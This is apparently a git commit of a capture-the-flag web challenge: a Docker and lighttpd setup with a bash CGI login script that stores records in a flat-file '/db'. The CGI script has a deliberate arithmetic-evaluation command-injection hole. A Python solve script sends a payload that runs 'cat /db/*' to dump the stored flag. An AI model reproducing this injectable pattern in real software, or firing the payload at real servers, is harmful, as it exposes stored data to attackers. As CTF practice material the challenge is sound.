cscg ist super

This commit is contained in:
2026-04-10 03:31:12 +02:00
parent 7a9dfeda60
commit db0324c43d
99 changed files with 92358 additions and 0 deletions

View File

@@ -0,0 +1,20 @@
FROM docker.io/ubuntu:noble-20241118.1@sha256:80dd3c3b9c6cecb9f1667e9290b3bc61b78c2678c02cbdae5f0fea92cc6734ab
ADD --chmod=0755 --checksum=sha256:4c97fd03a3b181996b1473f3a99b69a1efc6ecaf2b4ede061b6bd60a96b9325a \
https://raw.githubusercontent.com/reproducible-containers/repro-sources-list.sh/v0.1.0/repro-sources-list.sh \
/usr/local/bin/repro-sources-list.sh
RUN \
--mount=type=cache,target=/var/cache/apt,sharing=locked \
--mount=type=cache,target=/var/lib/apt,sharing=locked \
/usr/local/bin/repro-sources-list.sh && \
apt-get update && \
apt-get install -y lighttpd
COPY www/ /www
RUN chmod -R a+rx-w /www
RUN mkdir /db
COPY lighttpd.conf run.sh /
ENTRYPOINT ["/run.sh"]

View File

@@ -0,0 +1,10 @@
version: '3'
services:
web:
build: .
container_name: innovation-at-work-app
ports:
- "8000:8000"
environment:
FLAG: dach2026{fake_flag}

View File

@@ -0,0 +1,12 @@
server.modules = (
"mod_cgi",
)
server.document-root = "/www"
server.port = 8000
user = "www-data"
cgi.assign = (
".cgi" => "/usr/bin/bash"
)

View File

@@ -0,0 +1,22 @@
user object at:
/db/13550350a8681c84c861aac2e5b440161c2b33a3e4f302ac680ca5b686de48de:13550350a8681c84c861aac2e5b440161c2b33a3e4f302ac680ca5b686de48de
Flag is stored at:
/db/938c2a3dfa19c1a46821bed04912db62f9fdb134737804213cd67099482dc640:random_password_hash
Execution: `exec lighttpd -f /lighttpd.conf -D` => use lighttpd.conf and do not deamonize
```
server.modules = (
"mod_cgi",
)
server.document-root = "/www"
server.port = 8000
user = "www-data"
cgi.assign = (
".cgi" => "/usr/bin/bash"
)
```

View File

@@ -0,0 +1,17 @@
#!/bin/sh
example_hash="$(echo example | shasum -a 256 | cut -d' ' -f 1)"
echo '{ "name: "Max Mustermann", "age": 10 }' > /db/$example_hash:$example_hash
flag_hash="$(echo flag | shasum -a 256 | cut -d' ' -f 1)"
password_hash="$(head -n 32 /dev/random | shasum -a 256 | cut -d' ' -f 1)"
echo 'dach2026{fake_flag}' > /db/$flag_hash:$password_hash
chmod -R a+rwx /db
unset example_hash
unset password_hash
unset flag_hash
exec lighttpd -f /lighttpd.conf -D

View File

@@ -0,0 +1,12 @@
import requests
URL = "https://jgojibkxquhifqyvar6c5c6j6n-8000-innovation-at-work.challenge.cscg.live"
def fetch_data(s, apiversion: str, name: str, password: str):
url = f"{URL}/get.cgi?apiversion={apiversion}&name={name}&password={password}"
r = s.get(url)
print(f"{r.status_code}: {r.text}")
with requests.session() as s:
payload = "a[$(exec%20>/proc/$$/fd/1;echo;cat%20/db/*)]"
fetch_data(s, payload, 'dummy', 'dummy')

View File

@@ -0,0 +1,58 @@
#!/bin/bash
echo "Content-Type: text/plain"
if [[ "$REQUEST_METHOD" != "GET" ]]; then
echo "Status: 405 Method Not Allowed"
echo ""
exit 0
fi
apiversion=""
name=""
password=""
readarray -d '&' -t params < <(printf "%s" "$QUERY_STRING")
for kv in "${params[@]}"; do
key="${kv%%=*}"
value="${kv##*=}"
dvalue="$(printf '%b' "${value//%/\\x}")"
case ${key} in
name)
name="$dvalue"
;;
password)
password="$dvalue"
;;
apiversion)
apiversion="$dvalue"
;;
*)
echo "Status: 400 Bad Request"
echo ""
exit 0
;;
esac
done
if [[ "${apiversion}" -ne 1 ]]; then
echo "Status: 400 Bad Request"
echo ""
echo "unsupported API version: $apiversion"
exit 0
fi
password_hash="$(echo "$password" | shasum -a 256 | cut -d' ' -f1)"
name_hash="$(echo "$name" | shasum -a 256 | cut -d' ' -f1)"
# poor man's database
if [[ -f "/db/$name_hash:$password_hash" ]]; then
echo ""
cat "/db/$name_hash:$password_hash"
else
echo "Status: 404 Not Found"
echo ""
fi

View File

@@ -0,0 +1,3 @@
<html>
<p>It is working!</p>
</html>